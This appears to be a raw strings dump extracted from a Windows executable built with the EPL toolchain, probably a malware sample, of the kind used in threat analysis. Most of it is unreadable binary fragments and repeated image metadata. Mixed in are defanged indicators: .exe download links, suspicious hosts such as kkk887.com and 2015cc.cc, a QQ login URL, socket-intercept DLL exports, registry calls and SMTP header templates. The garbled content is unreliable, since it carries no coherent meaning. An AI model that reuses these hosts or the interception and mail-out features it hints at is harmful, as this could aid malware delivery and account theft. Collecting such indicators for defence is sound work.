G;/q%u

'%CMZ

k1o

t3i .CS

[email protected]

%dQy7

h:B.VtI

h.ixN

ÝlP

.MlZpI

< g.WQ

]}msGz

(h.eG]

dA.Yd

.fZs}

Q.XA})|a

/X%9x3I

C.PZ_k<

Y?]=]%.S

L.CCR

|  .ID4

)-.fZ

ioLó4

%UM1C~k

!QN.WMm

aS.Fm.

rSDP%f

d.ydJ6'

$6sjU.of

k5}@%f<vSk

nA%Ur

2gJ8-Iv}%

%fo5Z

[.oRw

D%spY

E^N%f

|)C=c

.PpHH)w

Js7.oUM

.pj#e3 T&

%X.LvIE4

)%dxJ

L%S!B

".Zn,Y

s
5

%cQ)X`@

v2QÂK

K%cx}

(j!&D%X3T

%FSo.Ho

o:\='Q"

%f@BzL

X~.nX

E).irY

A2.JC

[G68%x

.da7$

&%Ct5

}7%xi

.Cbs!

.BO|w;

!o%S;7

u(M.qN

~-.iB

O.uV'.

.ueW:Eq

.Ny@NZ

Bk%uw

v7V%Ua

<.Bm#

.QvY~

ñ@\

DRyx2.xd

{(.Hc

3%X)6

_%cJ\~

".Tfx]}

7.uJ?

EG.GQ

m(eN%F

jM%M.Ef

9 b-.JG6

mEC%c

.fcnN

jW$`&.yy

Q%F[O

D%tcP

m2.Jc

Z%Xz9

vg%coRT

0Ä^

#5~%X

b.Jud

.aY s

%ôT

%1xp3

C%sYJ

%3S;Z

"/.Zu"

C)=%s

.iZ6R

d/.Rj

%x#LE

D.Â

!~UrL]

2Mü

hP.RM

i-.yX

%XgT 

lPEXe

bi.LM

8oO.Sb

=.zsN

vZW%D

.YN|]H1

w.Cc=

>.nZ0

.Mjbf

GH.RR

&]%FKW{

@s.Lo

u.hGg

}m.wo>

f8<%D

^3.AB

 %x90

Be.Kk

[4dMoI.AV

v.GS8

W%u*~

^Uy.zc;

-Y}^p

w9%Ub

'TÓ

-v}0t

Xc.wR

.GFRal

n.Dr~

Y%S[&p

:.%sh

e-2z}4Cw

'P.TdY5:$8G :

%C%ZA

/S]

t8%Dl

.iEsb

\.nq8

.Emwf

eFTp{w

AOM%C

.dtOG

J4x.ad3

&.OUA'G@

.Az}l

.eB=V/

.MbIT

õkw

-sSh7hA

;?.Np

!ÊU

.My.UA

.zq*L

j.Ha<t

Yu.MT

".pHyd

-J}9DI

N.tk9o

.kIZ#

j-s0}F

Mpe.ep

].QFP

0E.pD

1&.AA'H

%UV'y

s%U:OJ

f.vPE

<%SS_

d.Rvn2&e

"SshU6m*v6

?%dYI.

2.bD0

~_%X^TO

.mN}/

<.cRZ

7%SVQ

%3shF(

&Z%s:

%DK5F

IM%5s

BB%xT

wBh.AAE8r

.jte7

-u}b~$B]

%Fzo<oo

(.bJA

8).tW

%D/2Y

.NAp4

]Pl-Mn}

hCD.Ii

a[.qm

P:%C 

-e}g.

=k.QB'

zj%3x

1q:%X

S##.AF

8).Aa

~}a%7xQ

$NZ%D?

.aY}Z

&*.eY:u

aw%S=q

lR.KL

jkq%d

Jj|C

.oB2O

rs.Rz

4-%c'

%X*B4#

Sp1%XM!n

[hu^.RJp@

km3%d

0[t%FJ4

,Qñ

t.oWk3

dW*%u

WT.RP

Y.TMPR

M,B%D

t%SmP

x.Ktv

@.mW~

y<2%sG

z.rnS

#p.ApnMp

}.UUI

3.hWKl

.nC\F

%xB\ 

U o&E%f

2.ej<

tP%sP<?

:%X<<

.NOUx

f\.iV

`i.RZ

"0Z.Wt%

.KmR(

[f.iA

d.wX)

)]%ShE

V>y,%X!'N

8.UXb

cmD"g

.AuM@

$g.MT

.Gw%g

%u_;3a

.gjdF

RZ<kv!h%S

^egg.wqe

p].Vq>

bD.ix

`y.kz

.ul"b

%K.APB

c".DYf

y9.hU

%CY<@

_.tlS

 V3qvjd%fM

F:\6p

.zd"p

2UdpxdZ

||.VWFgL

c_dC&.PM

=TQ%s

Q.Hm'

DA i%f

muw

#A!,'eO2

u2o%x

C÷{#

6*.Tl

.xWQw8

,`.re8

.yN?Qz^

K`N.gH

.CosYD

\}MK.Cj

|AB%S

Fl kEY

.VZN0

6iB%DJ

`.QFH

a1

O}U%f

[(%cr-1

aisSH

.Pskib

.fk=#

%C"|i

.lk]Y

tkI.mE

rS%Ck

i.Te(

<)W.sP

@@T.HgP]L

XK%x/z

pt.EzC

.AyT7

.hraq

:.psNV

\(\9);3<

wEXe

/tL%X

&W.wl

t,.nPq

#a%c&

.XY<4

.LHvCx

@-k}.5

n%C,s

T.Hy'

$.Mqfz29

7r.rb

.pnNd

/&.ym!

y$'#w%SZ

@Y.JH

?.iW/

v%UU7

[ru8%C

e.RnR

'5 !a%fK{:

A.Ul-

!l?%u

[.WX{x

5].tq*=

Ej.nrA

g%XU_

.wR/C

%sB9s

``v.Pp

Kv1(%c

[-FF}

.LUR[

2.Uc,

`y.QN

W^.Vq3

.qLu*<

*>.fEo

Sw%%D

#_-G}2

^_([;<,A-%u

.JZ-$a

'O%Fj

CVL%U

D%xcD~

3B%Dz

ip].DL

1j/%uU0

G<Q.ho

œ?zt

^:.wp'V

O*J.xZ

BSl%U

1.vw3

7qP.ax

VF.Vw

L.ys\

.ax_O

3l`.ic`-

]$.vFk

%U#T6?j

x${>.bn@

04p%S

&-.pbh$

P_.Xh%Z

rB%sJ

\ko.Sa

WD%s|

e.aMM

3.VH#_

6.Tn>

eB;.Ir

[u.Gt

;%Stpx

nMr%d

Y).Ar_

0%1xl?

%YR%0u

)%x ?

>[@~.oN

qSql

as}To%s

dT:|%s

@p%UR\}

/}.np

F.WxA2

.xA0[

fJ.WM_

27762772

hXXp://VVV.jindiaoqizhong.com/ffdy/434/877195/

hXXp://jifendownload.2345.cn/jifen_2345/sohuva_k43181459_207920841.exe

hXXp://kkk887.com/1.txt

hXXp://VVV.2015cc.cc/kzw/sp

%S4WD

hg%fpM

S.Ac9SR

0.I%3s

,wAe.kI

aiUy'4xu

%c*@j

.eH'y

{&%U)

lj%4U

xe%CNs

9F.cLe

hJK.ZH

O.qt0

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

SkinH_EL.dll

[email protected]

hXXp://memeda528.32.5vv.cc/gundong/index.htmlp

88888888

-7.Uwn

VVV.qb123456.com

?%u%{

}ZW%c

.WFHk

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9" xmpMM:DocumentID="xmp.did:8F344654DBA811DEB71BD221157C7B0C" xmpMM:InstanceID="xmp.iid:8F344653DBA811DEB71BD221157C7B0C" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FE0C77CEA6DBDE118485A677BD4C7952" stRef:documentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9" xmpMM:DocumentID="xmp.did:84C57CD4DBA711DE92108C4D32F52532" xmpMM:InstanceID="xmp.iid:84C57CD3DBA711DE92108C4D32F52532" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FF0C77CEA6DBDE118485A677BD4C7952" stRef:documentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:EF7D6715C45A11E485EC8F35618C516D" xmpMM:DocumentID="xmp.did:EF7D6716C45A11E485EC8F35618C516D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EF7D6713C45A11E485EC8F35618C516D" stRef:documentID="xmp.did:EF7D6714C45A11E485EC8F35618C516D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

URL overrides

New Windows Thumbnail

20%u:

%Dt@w%

) t.RzR

hXXp://VVV.2015cc.cc/kzw/pj/index.htmlr

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:73F35EF3DBB011DE9858958579A2A007" xmpMM:DocumentID="xmp.did:73F35EF4DBB011DE9858958579A2A007"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:73F35EF1DBB011DE9858958579A2A007" stRef:documentID="xmp.did:73F35EF2DBB011DE9858958579A2A007"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

NU%U&

r.wtG

hXXp://VVV.2015cc.cc/kzw/gd/index.html

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:57EACE31DBBE11DEA0B1983BF43513E6" xmpMM:DocumentID="xmp.did:57EACE32DBBE11DEA0B1983BF43513E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:57EACE2FDBBE11DEA0B1983BF43513E6" stRef:documentID="xmp.did:57EACE30DBBE11DEA0B1983BF43513E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:D24C0F61DBAD11DEAEC3B6DE96F213EF" xmpMM:DocumentID="xmp.did:D24C0F62DBAD11DEAEC3B6DE96F213EF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D24C0F5FDBAD11DEAEC3B6DE96F213EF" stRef:documentID="xmp.did:D24C0F60DBAD11DEAEC3B6DE96F213EF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:93F6E3F9BF9F11E4874D8EF33C9CC59E" xmpMM:DocumentID="xmp.did:93F6E3FABF9F11E4874D8EF33C9CC59E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:93F6E3F7BF9F11E4874D8EF33C9CC59E" stRef:documentID="xmp.did:93F6E3F8BF9F11E4874D8EF33C9CC59E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:E9FB23472AF2E211AF9CC92A32AF6A3C" xmpMM:DocumentID="xmp.did:AED09BD8BF7911E4AC95AF473678F0F9" xmpMM:InstanceID="xmp.iid:AED09BD7BF7911E4AC95AF473678F0F9" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E9FB23472AF2E211AF9CC92A32AF6A3C" stRef:documentID="xmp.did:E9FB23472AF2E211AF9CC92A32AF6A3C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

M(.xc

XA.fN

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:873C434BBF8D11E48E02C365ED3149E4" xmpMM:DocumentID="xmp.did:873C434CBF8D11E48E02C365ED3149E4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:873C4349BF8D11E48E02C365ED3149E4" stRef:documentID="xmp.did:873C434ABF8D11E48E02C365ED3149E4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:71F0E2EAB61E11E49BD68537D1E2B151" xmpMM:InstanceID="xmp.iid:71F0E2E9B61E11E49BD68537D1E2B151" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CD86DBC7B61911E4B721F98B7A56B8AE" stRef:documentID="xmp.did:CD86DBC8B61911E4B721F98B7A56B8AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9" xmpMM:DocumentID="xmp.did:9D228484DBA711DEB3B5DB2623E2C2BB" xmpMM:InstanceID="xmp.iid:9D228483DBA711DEB3B5DB2623E2C2BB" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FF0C77CEA6DBDE118485A677BD4C7952" stRef:documentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9" xmpMM:DocumentID="xmp.did:C86AD3BADBA911DE90A5E1E94D9CBE04" xmpMM:InstanceID="xmp.iid:C86AD3B9DBA911DE90A5E1E94D9CBE04" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C51443BB85DBDE11836BF59D3CFA84C9" stRef:documentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9" xmpMM:DocumentID="xmp.did:71070384DBA711DEA86CC32742DB3E19" xmpMM:InstanceID="xmp.iid:71070383DBA711DEA86CC32742DB3E19" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FF0C77CEA6DBDE118485A677BD4C7952" stRef:documentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9" xmpMM:DocumentID="xmp.did:7FC5ADCADBA811DE8209A9E000974914" xmpMM:InstanceID="xmp.iid:7FC5ADC9DBA811DE8209A9E000974914" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FE0C77CEA6DBDE118485A677BD4C7952" stRef:documentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

)'&987`^]

TSQljg-, WUS0//

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9" xmpMM:DocumentID="xmp.did:5514127ADBA711DE95AEC1F077B46927" xmpMM:InstanceID="xmp.iid:55141279DBA711DE95AEC1F077B46927" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FF0C77CEA6DBDE118485A677BD4C7952" stRef:documentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9" xmpMM:DocumentID="xmp.did:62259578DBA811DEBF88934356583946" xmpMM:InstanceID="xmp.iid:62259577DBA811DEBF88934356583946" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FE0C77CEA6DBDE118485A677BD4C7952" stRef:documentID="xmp.did:C51443BB85DBDE11836BF59D3CFA84C9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:3E1957E9DBBD11DEB728B79781287817" xmpMM:DocumentID="xmp.did:3E1957EADBBD11DEB728B79781287817"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3E1957E7DBBD11DEB728B79781287817" stRef:documentID="xmp.did:3E1957E8DBBD11DEB728B79781287817"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

hXXp://ui.ptlogin2.qq.com/cgi-bin/login?appid=1006102&hide_title_bar=1&f_url=loginerroralert&no_verifyimg=1&qlogin_jumpname=jump&hide_close_icon=1&s_url=hXXp://id.qq.com/

^~{',=)>

.xSRz

i'&.Us

VVV.2015cc.cc

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:20B183CBF44011E29F5299962710C6A4" xmpMM:DocumentID="xmp.did:20B183CCF44011E29F5299962710C6A4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:20B183C9F44011E29F5299962710C6A4" stRef:documentID="xmp.did:20B183CAF44011E29F5299962710C6A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:DCE05F77F44011E28C4FC81A00283827" xmpMM:DocumentID="xmp.did:DCE05F78F44011E28C4FC81A00283827"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DCE05F75F44011E28C4FC81A00283827" stRef:documentID="xmp.did:DCE05F76F44011E28C4FC81A00283827"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

kkk887.com/ingtp/

RASAPI32.dll

RegDeleteKeyA

RegEnumKeyA

RegOpenKeyA

oledlg.dll

WSOCK32.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

(*.htm;*.html)|*.htm;*.html

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

hXXp://dywt.com.cn

[email protected]

 86(0411)88995834

 86(0411)88995831

Windows

(ESPINN.dll(NN

This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit VVV.dywt.com.cn/info

CallerInfoCopyCmd

SetIPPort

GetIPPort

"C:\Windows\System32\ESPI11.dll"

ProviderInstallCopyCmd

SockDataCopyCmd

SockAddrCopyCmd

enetintercept_fnSockAddrSetIPPort

enetintercept_fnSockAddrGetIPPort

enetintercept_fnInstallCopyCmd

enetintercept_fnSockDataCopyCmd

enetintercept_fnSockAddrCopyCmd

enetintercept_fnCallerInfoCopyCmd

%s\ESPI%d.dll

hXXp://VVV.eyuyan.com

 86(0411)39895834

 86(0411)39895831

DelAllKeyValues

DelKeyValue

GetAllKeys

GetKeyValue

AddKeyValue

DSGetErrMsg

BiTreeGetCurNodeKey

ListGetCurNodeKey

ListUpdateNodeFromKey

ListRemoveNodeFromKey

edatastructure_fnMapDelAllKeyValues

edatastructure_fnMapDelKeyValue

edatastructure_fnMapGetAllKeys

edatastructure_fnMapGetKeyValue

edatastructure_fnMapAddKeyValue

edatastructure_fnBiTreeGetCurNodeKey

edatastructure_fnListGetCurNodeKey

edatastructure_fnListUpdateNodeFromKey

edatastructure_fnListRemoveNodeFromKey

KeyJOYBUTN12

KeyJOYBUTN11

KeyJOYBUTN10

KeyNUMKEYS

KeyJOYBUTN9

KeyJOYBUTN8

KeyJOYBUTN7

KeyJOYBUTN6

KeyJOYBUTN5

KeyJOYBUTN4

KeyJOYBUTN3

KeyJOYBUTN2

KeyJOYBUTN1

KeyJOYBUTN0

KeyMOUSEBUTN4

KeyMOUSEMIDDLE

KeyMOUSERIGHT

KeyMOUSELEFT

KeyPAUSE

KeyPRINTSCRN

KeySCROLLLOCK

KeyCAPSLOCK

KeyNUMLOCK

KeyNUM9

KeyNUM8

KeyNUM7

KeyNUM6

KeyNUM5

KeyNUM4

KeyNUM3

KeyNUM2

KeyNUM1

KeyNUM0

KeyNUMPERIOD

KeyNUMENTER

KeyNUMPLUS

KeyNUMMINUS

KeyNUMSTAR

KeyNUMSLASH

KeyPGDN

KeyPGUP

KeyEND

KeyHOME

KeyDEL

KeyINS

KeyF12

KeyF11

KeyF10

KeyF9

KeyF8

